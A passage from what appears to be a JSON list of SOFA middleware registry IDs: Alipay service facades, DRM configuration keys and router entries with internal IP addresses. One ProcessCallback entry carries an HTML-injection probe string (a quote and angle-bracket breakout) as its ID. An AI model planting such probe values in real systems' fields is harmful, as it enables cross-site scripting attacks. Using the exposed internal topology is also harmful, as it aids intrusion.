uleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finhadecision.common.service.facade.api.MainBodyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ins.policy.service.facade.InsPolicyVisitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_POINT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.73.142.181#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antmember.common.service.facade.config.SeqGenerateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:bizadviser@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmSlaDynamicDecisionTrigger.openAddUserFlagStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.4.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ifincore.facade.channel.ChannelMetadataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.PhysicalTenantDagSubscribeApi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.service.integration.zcbprod.AssetQueryForFinancemngFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskflowlib.common.engine.engine.RiskFlowEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipPromoteResource.autoShareExcludeRooms,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.emc.common.service.facade.api.EmcAcceptDetailManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_PCREDIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finslip:name=com.alipay.finsupport.component.cache.ctrldata.drm.CacheDRM.refreshKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemsgprod.common.service.facade.marketing.MsgMarketingBizCustomizeService:1.0:mobilechat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.check.Face2FacePayModelInfoCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepolaris.common.service.facade.mobilegeocoding.MobilegeocodingTestToolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bstsolprod.instalment.inner.facade.api.TradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.ApplicationAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorcenter.common.service.account.facade.AdvisorAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyRelativeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.goldeneye.PatekGoldenEyeCrowdStrategyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promokernel.common.service.facade.api.DivideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.bumng.common.ozawa.service.facade.ToDoItemService:1.0.0:taskcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.permission.AuthConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcloandecision.common.service.facade.service.ContractDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:trustiot@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ap.promotion.common.service.facade.api.voucher.VoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.AppConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_OYZ_DATA_SYNC_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csrobot.service.facade.mng.api.LogMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.18.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobiledataprod.service.facade.SnsRankingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pkgcore.common.service.facade.PackageOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acordercore.common.service.facade.order.SyncOrderFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mshopprod.neardata.query.service.ShopSpecialCoverQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mdeviceprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ecdcc:name=com.alipay.eccommon.monitor.drm.resource.LoggerSwitchControlResource.dalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.apshopcenter.common.service.facade.EpidemicBlockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.globalsite.ipaycrm.facade.api.CrmElementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.cache.facade.MerchantCacheQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.service.facade.MobileDecisionCfgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.fundapply.config.impl.FundApplyExecConfigDRMResource.insertRiskInfoSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:chainTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.clientpublish.drm.ClientPublishDRMImpl.whiteListSwitchTrDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.106.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservice.common.service.facade.api.workflow.WorkflowExportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifeprod.common.facade.insure.InsLifeInsureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.loadTestZdatabusTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.api.ProdTopicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.feature.common.service.facade.api.feature.FeatureOutputQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.feecharge.common.service.facade.api.ChargeRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.acbsbcore.common.service.facade.AliyunPopApiConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityexprod.common.service.facade.alipayauth.AlipayAuthUserProdManagerServiceFacde:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.71.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_BKLOANLEND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.23.180.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csbizcenter.facade.GrayDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:zpdcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.tradeexpord_misc_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.20.145.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.159.249.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_cloudFunds_isvParamEdit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_GFMAC#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.zmodel.core.evaluator.config.ZModelCoreEvaluatorResource.betaRatio,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finadvisorprod.common.service.facade.api.SelectUserAdminUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.query.YebcUserIncomeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.42.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileha.biz.antha.ha.AnthaDataManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.api.content.qa.TopicUpdateApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.143.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.insproductcore.facade.service.InsFcCatalogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.instriskcenter.facade.api.InstCooperationBusinessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.134.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:scfmngAdvanceRcvCreditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordercore:name=com.alipay.ordercore.base.env,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openinsight.common.service.facade.rec.api.RecWordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iexclienttrdcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.reconmmendation.ShopRecomQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualitymeasure.service.facade.api.AqcPmdResultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.common.OneTimeTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.AdvisorAssignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.ptemplate.ProductTemplateQueryFacade:1.0:PDCORE_SSCMW1CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.AccountPoolQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qianli.common.service.neardata.facade.QianliHeartBeatFacade:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.fixedOrdersCntMax,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_O_ACRMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdPropertyInstService:1.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.scene.regulation.ExternalPaymentOrderFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:openaccess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cfaccounttrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquireOAuthCancelByAuthInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fin.pdcore.common.service.facade.adapter.advisor.AdapterAdvisorProductQueryFacade:1.0:finpdcorewealth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.DataDictSwitchConfig.rulePkgNamesStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mpaasweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmratecust.common.service.facade.rate.operate.RateOperateManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.31.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.240.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.mmtcaftscmdproc.common.service.facade.DeviceStatusManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.shangshu.antiparser.facade.gateway.AntiParserGateway:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.card.CardMngConfigFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.common.service.facade.beike.CheckinFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.112.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.biscenter.common.service.facade.agreement.facade.AgreementQueryCommonFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbmmweb.facade.AlscService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.154.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dpc.dasbi.common.service.facade.api.PortalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingTimeRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.AutoFlowFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.merchant.MerchantLocationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointprod.common.util.resource.PointCapacityDrmResouce.agentDispatchInstStart,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.mextitemcenter.common.facade.api.RetailerQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.FundManagerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.dal.ldc.offlinepay.daointerface.ServiceOperateLogDAO:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.biz.delivery.rpc.AdvDiscountQueryRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.article.ArticleRecommendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.bizprodmng.biz.shared.drm.impl.KbsearchDrmConfigImpl.offlineOpponent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.224.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opencore.service.facade.channel.ExternalChannelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bismng.service.facade.SecuritySceneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.isvoperation.IsvOperationAuthorityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.core.service.doucode.ACodeAccountRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csivr.common.service.facade.api.UserInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:finfundcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.187.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.jiuzhou.core.flowswitch.dr.clusterstorage.ClusterDataTransfer:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.open.AppInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.LoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.qconsole.facade.TransactionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.bankcardTairCache.smartFoProvider,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.yfd.common.service.facade.ds.DataSetOperateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.securitycore.common.service.facade.sysparam.SystemParameterService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.settlecore.RareWordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-ofpgrowth-task#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:sdabombardier@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.resource.TaobaoBindingAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imatchfacade.arrange.ArrangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paymentmng.service.facade.paycore.PmtUfrzPaytoolStyCfgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mfinsnsprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mrchiswisdom.paidan.common.service.facade.operate.IssueOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.EbppPerformOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:foo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ordercore.common.service.facade.OrderOperateFacade:1.0:zhiMaOrderOperateFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rpc.common.service.facade.pb.SampleServicePb:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.nameReturnExtRespMsg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:csmng_batchpay_add@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.enterprise.facade.EntOperatorConsistQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.BusinessAreaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.112.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@paygrowth#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fininfoDataTairCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.LpLoanApplyConfigDrm.hitF51LabelUserIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_SUB_SERVICE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antfeaturelib.common.facade.service.DrmManageProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mfinquotationprod.common.service.facade.api.QuotTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.budgetcore.common.service.manage.subBudget.SubBudgetManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimitnear:name=com.alipay.rule.core.repository.drm.RepositoryConfigResource.repositoryConfigProperty,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iriskmerchant.core.service.analyze.MerchantCRAnalyzeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.paymentmng_pcconfigReadDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_P_KEY_WORD_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.emccenter.common.service.facade.api.AemcPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.biz.open.api.facade.CommonQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custview.facade.AccessTokenViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yuyan.core.FileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhcprod.core.service.CollectionActivityRecordCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crsociety.api.AppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.risk.api.RiskAnalyzeService:1.0:ictu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivecenter.common.service.facade.api.ClcAccessExtQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.config.api.SceneConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:iholoxmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MerchantSettledFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finorm.biz.facade.api.HAMetadataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdchecker.service.analyze.spi.SecurityReverseService:1.0:fraudmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.core.cache.ClusterNotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.common.service.facade.ExpEventInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.risk.api.RiskProcessService:1.0:grey@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.fc.argo.service.facade.ValueObjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.securitycore.common.service.facade.risk.api.RiskAnalyzeService:1.0:ctu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.miniapp.api.AppTagManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.108.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@openctrl#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.sync.sessiontair#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.cif.client.drm.ConvertorClassloaderSwitcher.reload,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.scardcenter.common.service.facade.CertServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.XflushAlarmFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databizprod.common.service.facade.anticheat.AntiCheatExternalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.CommonSwitchConfig.oldToGeneric,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acauthcore.common.service.facade.manager.CategoryManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.imerchantsettle.common.service.facade.api.TransOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.api.DataDictionaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_LOADCENTER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.koa-patch:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.prizecore.common.service.facade.service.PrizeRecommendQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\"'>@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.bd.BdOpportunityManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.loan.api.FinancingUserTemplateCstrFacade:1.0@DEFAULT#@#DEFA